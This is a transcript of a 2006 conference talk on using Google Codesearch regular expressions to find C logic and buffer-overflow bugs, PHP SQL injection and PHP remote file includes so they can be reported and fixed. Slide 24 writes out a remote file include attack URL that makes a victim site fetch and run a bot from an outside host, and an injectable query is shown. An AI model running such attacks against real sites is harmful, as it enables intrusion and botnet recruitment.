hola a todos, buenas y gracias. hello everyone, i hope all of you are having a good day, and thank you for coming. my name is jose nazario and i'll be talking about google codesearch. the talk will be in English, and i'll take questions and your comments in #qc. you can find the slides on my website at http://monkey.org/~jose/presentations/umeet06/slides/ ... [slide 1] today's talk is intended to introduce you to google codesearch and ways that you can use it to find all sorts of programming bugs in dozens of software applications at once. i'll provide you with a one or two slide introduction to google codesearch. also, since i promised google tricks (plural), i'll give you guys one more that i don't see used often: the dot operator. i found this accidentally when i was looking for an RPM package once. i found that "package.rpm" brought up "package, rpm" also. turns out that google seems to drop punctuation from the index and from your search terms, and replaces it with the generic "stuff we don't index" filler. so, you can now join your words in a phrase with the dot and match all sorts of combinations. compare searching for "foo bar" against "foo.bar" (with the first still quoted). the quotes enforce a space, but the dot allows you to have commas or other non-word stuff in there. kind of neat, and like i said, i don't see people using this often. [slide 2] a bit about me: i am a senior security and software engineer at arbor networks in ann arbor, michigan (USA). that basically means i write software, develop new products and features, and analyze security incidents, vulnerabilities, and tools all in my job. i am not employed by google and i do not represent them. keep this in mind when you're watching this talk. this is not an official google talk. the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ [slide 3] ok, google codesearch. as i recall it was launched by google's "labs" division (where new products come from) in early Octobers, 2006, so just a couple of months ago. codesearch is different than google's normal search in that it focuses on searching source code on the web. this includes C, PHP, C++, Java, and of course scripting languages like python, ruby, and perl. like google, it supports search operators, which let you control the search inputs. unlike google's basic search, however, it supports regular expressions. this means we can really dig into code flexibly. before, if you wanted to search on google for some source code you had to use the terms and "lang:c" in your input. now, google codesearch lets you apply patterns to find things more flexibly. in a nutshell, google's indexed millions of source code files. they've downloaded it so you don't have to! great if you have ever been curious about searching for bugs in code, like we'll be doing. far easier than downloading thousands of source packages, storing them, and grepping through them. google codesearch isn't the first code search engine. koders.com has been around for a while and they have a neat engine. it doesn't appear to support regular expressions, but it does have many other neat features. i recently used koders.com to find some BSD licensed code to include in a tool that i ported from BSD to Linux. these search engines are great for that sort of thing. [slide 4] ok, it's a beta of a google product so it'll have some bugs, that's to be expected. it tends to forget that you want a case sensitive search once you crawl past the first page, for example. also, it's regular expression engine is only applying the terms to a single line at a time, so you can't make use of back references (a power regex facility that let you build up complex queries on the fly). also, google codesearch doesn't always know what the newest source archive is, so sometimes you'll find a great bug and it will have been fixed in a a newer version. all in all, though, not a bad tool to have at your disposal, as you'll see. the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ [slide 5] OK, so basics about regular expressions in case you haven't seen or used them before. regexes are basically a way of expressing text patterns to match specific characters or ranges of characters. for example, to match any character you can use the . characters; the * means 0 or more characters, and + means one or more of the preceded characters. these can be mixed and matched, of course, such as .+ to mean one or more characters. to specify a range, use [x-y] to denote a range of characters, such as [A-Za-z] to match all alphabetical characters. if you wanted to negate something, use the [^x] character. sadly, this only works on a single character at a time, so [^a-z] wont work. :-/ you have to escape characters that have special meaning, like (, ) and . using the backslash: \. to match a ., or \( to match a (. see the URL in the page to learn more about regex formats. they're not that hard to learn, but very complex ones require some practice. because they're used in so many things in UN*X-land, you should become familiar with them. [slide 6] just like normal google searches, you can use special operators to restrict your search. you can focus on the C language, for example, using "lang:c" in your search. you can also negate these, or chain them together: foobar lang:(c|c++) -lang:php you can also restrict by license, using the license: operator. ie to get only GPL files, use license:gpl. google codesearch infers the license from various files in the source repository. you can, of course, restrict by filename or by package, using the operators file: and package:. this basically applies these arguments to the result set. for example, to match only C header files, using file:\.h$ (anything ending in .h). you may want o focus on a particular package, focusing on only a website or a file format, using the package operator. this one is a lot like "inurl" in a standard google query. we'll be using some of these these operators in our searches to keep our results focused. [slide 7] the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ a couple of facts about google codesearch, one known and one not so well known. if your result set has more than one hit, you can use "n" to browse to the next result (kind of like "n" in a vi search). very handy! google codesearch highlights the results for you, also very nice. secondly, google codesearch seems to include some non-software archives in its index. i found this by accident while searching for my name! basically, what i found was someone's Linux home directory backup. because they had some example code on a website that i wrote in their mozilla cache, google marked it a sa code archive to include. voila, i found their backup. quite interesting, to say the least. i'm sure other interesting backups are out there, too. [slide 8] screen shot showing my results that found a backup in google codesearch. this is a backup of someone's home directory. my name appeared in their mozilla cache. [slide 9] in a nutshell, this is our strategy for finding bugs. it's based on the basic openbsd philosophy: find a bug, fix it, generalize the form, find it everywhere, fix it everywhere. for example, when you find a typo, it's usually not the only one of its kind. fix it, find the others, and fix them. what we're going to do here is to to identify a bug or some bad programming practice, and generalize that form into a regular expression. we'll then apply that regular expression to google codesearch and then examine the results. i've found that a well formed regular expression yields about 10% or more in bugs from the search results. what you should do when you apply this is to ensure that the bug still exists in the latest version of the code. i often have to visit the project website, look for the latest released version and possibly the source repository (SVN or CVS) and see if it's still there. if it is, i think generate a patch and file a bug. i did this in October for a variety of projects, including OpenAFS, MPlayer, MySQL, and many others. i got a bunch of bugs fixed over a single cup of coffee, that's how easy this can be. [slide 10] the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ i'll show you four basic bugs here and how we find them in google codesearch. you'll learn the regular expressions for some common C logic bugs (at least two of which have real security bug implications), some C string handling bugs, and two types of common PHP bugs: SQL injection and file include bugs. [slide 11] the first set of bugs we'll find in google codesearch are some logic bugs. specifically, there's a logic bug in C that people encounter when they make the typo of "&" vs "&&". & is a bitwise AND, and && is a logical AND. specifically, you use "&" to test for the presence of a bit in a variable, and "&&" to test that two conditions are two (a logical AND). very often you'll see people building up a set of flags in an integer, mixing the flags together in a variable "flags". they'll then use logical ANDs to look for specific flags being set, such as FLAG_PROCESS or FLAG_OLD_INPUT. the test is if (flags & FLAG_MINE) { /* do some stuff */ } the complement of that is to look for two things being true, such as this: if (is_set && process) { /* do more stuff */ } only if "is_set" and "process" are not 0 or not NULL will that be true. a common typo to make is to see && when someone meant &. this is also present in the bitwise vs logical OR ("|" vs "||") and in the comparison vs assignment operators ("==" vs "="). [slide 12] ok, this is what we'll search for: flags\ *&&\ *[A-Za-z_]* this will look for the line where someone has "flags" (a common variable name) and a logical AND of a variable in upper case letters (usually used for a macro). this is a common typo in C code. what's funny is that the compiler treats this as reasonable code, so you wont get a warning for it! however, if "flags" is not 0 or NULL and the macro is defines as not 0 or NULL, this condition will always be true. this is bad, obviously, and not what the programmer intended. so, let's search google codesearch for this ... [slide 13] here is an example bug in neon, found and fixed by one of our interns. the blue highlights the for, and we can infer what the programmer meant by reading the code. what they meant to do was to see if the session protocol flags has the AUTH_FLAG_VERIFY_NON40x bit set, but in this case that part of the test will always evaluate to true. if the other parts of the condition are true, then we'll see a mistaken "verify" part get hit. neon fixed this bug after jon (our intern) filed a report. this bug prevents the neon DAV component from evaluating the session properly. it doesn't turn up often, but it is a real bug. a coworker, aaron campbell, found a doozy of a bug in openssl certificate checking this way. he filed a bug report and got it fixed in under an hour. i found several bugs in MySQL, Mplayer, OpenAFS and other projects like this, and even wound up finding a security bug in OS X using this expression. [slide 14] let's look for an old school C bug. this was common about 10 years ago and has been whittled away quickly, but you'll still find it from time to time. basically what we'll be looking for is the programmer copying user-supplied into into a buffer without any sanity or length checking. in this case, we'll look for someone using strcat() (string concatenation or joining) from a user supplied argument (argv[x]). this is possibly a reliability bug, and even a security bug in some cases. this isn't so common anymore, because it's so easy to find, yet people still do it. [slide 15] so, this is what we'll search for: strcat\ *\(\ *.*\ *,\ *argv lang:c this looks for strcat followed by 0 or more spaces, then an open parentheses, then any characters, then a comma, and then argv (with optional spaces, "\ *", in there). oh, and we'll restrict ourselves to the C language. the problem here is that the destination buffer may not be large enough to hold the user-supplied input. in fact, strcat() and strcpy() don't do any length checking, they happily shove all the data from the source into the dest and if it overflows, so be it. however, the user can craft the input and commit a basic buffer overflow. [slide 16] ok, it's 2006, and not surprisingly these are uncommon now. thankfully, too! this is a bug i foun while searching for this, we can see that the buffer "command" gets built as a 10240 byte (10k) buffer, and for every argument supplied, the command is grown by the next argument and a space. we may be able to overflow this, i'm not sure the shell would allow it, but you get the idea. here we have two idioms mixed that are dangerous: a user-controlled loop (argc controls how many times it executes) and user supplied input going into a static buffer unchecked (strcpy() from argv). bad code, and revealed by google codesearch. [slide 17] the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ here are some other basic C bugs you can look for. you can generalize the argc controlled loop pretry easily by looking for while loops and for loops including argc. other bug classes you can easily look for are format string bugs, looking for unformatted arguments to common functions like printf(), syslog() and the like. you can also look for overflows in the sprintf() and related functions. again, look for a user-controlled input. here, because google codesearch isn't allowing for backrefs, you have to weed these out manually. it's pretty tough to do, and =these sorts of bugs are not very common anymore, either. with backrefs, we could easily "taint" user supplied variable data and follow it through the code. [slide 18] so, let's move on to the first of two sets of PHP bug classes. the first is SQL injection attacks and vulnerabilities. SQL injection bugs are very common and easily created. basically, they come from scenarios where developers build up SQL commands using unescaped, unscrubbed user-supplied input. there's a link here to show you how to exploit SQL injection bugs. i wont get into that here, but suffice it to say it's trivial. [slide 19] so, this is what we'll search for: SELECT\ *[^%]\ *$_GET lang:php this looks for SELECT being followed by a GET parameter reference without any formatting going on. there's no escaping in many of these cases, as well. the results? about 2000 hits on google codesearch. now that's a lot of bugs! [slide 20] here's an example, and (so it would fit on the screen) this one isn't all that high profile. (some of the other projects that had this are blogging software, CMS software, etc, all sorts of web apps). here the query string is built from a raw, unprocessed user-supplied variable: $query = "SELECT * FROM item WHERE ID == '" . $_GET['id'] ."'"; "query" references "id" from the user without any stripping of special SQL characters. there's nothing stopping you from closing that query and creating a new one (ie to call out stored procedures to get shell access), or modifying it to show all items (ie where id = 1 OR id > 0). this is the basic form of an SQL injection bug, and easy to avoid. lots of PHP books show you how to avoid this, and this is sadly too common in PHP code. [slide 21] while i showed you SELECT for a GET parameter, you will also want to look for other SQL commands: INSERT, UPDATE, DELETE, and you'll also want to look for this in POST variables, too (ie $_POST['id']). when you expand this out, lots more bugs, all very similar, appear. :) the slides are on my website at http://monkey.org/~jose/presentations/umeet06/slides/ [slide 22] the second type of PHP bug class here is due to remote file includes. PHP has the "include()" directive which lets you include a local file. however, PHP also lets you include remote files from another web server. here the exploit is to grab a malicious PHP file off of a website you control. the exploit then has the argument to the variable include a URL. i recently found a bot that can be used in these attacks, called "pBot". it is designed to be included in PHP remote file include attacks and works quite well. [slide 23] so, what should you search for? just like before, look for the function using an unscrubbed argument: include\ *\(\ *\$_GET lang:php this looks for the PHP include function with an argument from the GET parameter, and only in PHP files. very straight forward, here the attacker can control the input directly. [slide 24] some real results found in google codesearch: include calls out to "page", a user supplied variable, and appends .php. what's the attack look like? suppose i have a malicious website and a malicious PHP file, like pBot :). i store it as http://monkey.org/~jose/php/pBot.php so, i attack an installation of this software like this: http://victim.com/admin.php?file=http://monkey.org/~jose/php/pBot the application, and the web server, will now include and run my PHP code. voila, a simple attack, and we found this in google codesearch. [slide 25] i showed you how to use the GET variable, and you should also look for PHP using untrustworthy input from cookies, POST variables, and anything else the user can supply, such as hostnames. also, you can find cross site scripting bugs this way, too, also looking for user-supplied input being used without any treatment. the PHP docs have excellent discussions on secure programming idioms, by the way, so if you code in PHP, make sure you follow those! [slide 26] ok, so i showed you four basic bug classes and how to find them in google codesearch. there are some obvious limits to using google codesearch for your code audits. first, you still have to read the code. you still have to follow the logic and see if it's a real bug, and you still have to understand the code and any implications it has. you still have to make sure it's the latest version of the code before you fire off a bug report. you have to tune your regular expressions to keep the false positives down. compare searches for "strcat" vs strcat\ *\(\ *.*\ *,\ *argv. the former will find lots of basic libc definitions of strcat, the later will find real uses of it. google codesearch is basically grep on steroids (in terms of speed and quantity of input, but it is missing backrefs), and it will only find single line bugs. you wont find many of the truly clever bugs this way. however, i found at least two security bugs like this in just one morning, over one cup of coffee: one is OS X (CVE-2006-4410) and one in another project i wont name here because the bug (and security hole) are still active. coworkers aaron and jon found two more security bugs in a matter of minutes. [slide 27] to sum it up, google codesearch is pretty nifty, and a lot easier than trying to download all sorts of code and screening it locally. believe me, i've done that! however, it doesn't support the google web service API yet, and it doesn't appear to be included in any IDE tools yet (like Koders is). i imagine this will happen in time. [slide 28] some more links for you to read. the first is from a coworker, aaron, and he gives some searches you can look at and explains how they work, and the bugs they yield. a very great post! aaron's an awesome hacker and a great coworker at arbor. the second two are posts by me discussing codesearch and giving some basic insecurity statistics using it. the fourth is a post from the securiteam blog giving more searches and their results. lots more fun luring in google codesearch, that's for sure. [slide 29] finally, again, this was all started by a morning IRC conversation with my arbor colleague aaron campbell. we wasted a good morning futzing around, finding bugs, and aaron found a nifty openssl 0.9.8 bug in a matter of minutes. make sure you read his blog posting. thank you all for your time and attention, i hope you have found this to be fun and interesting.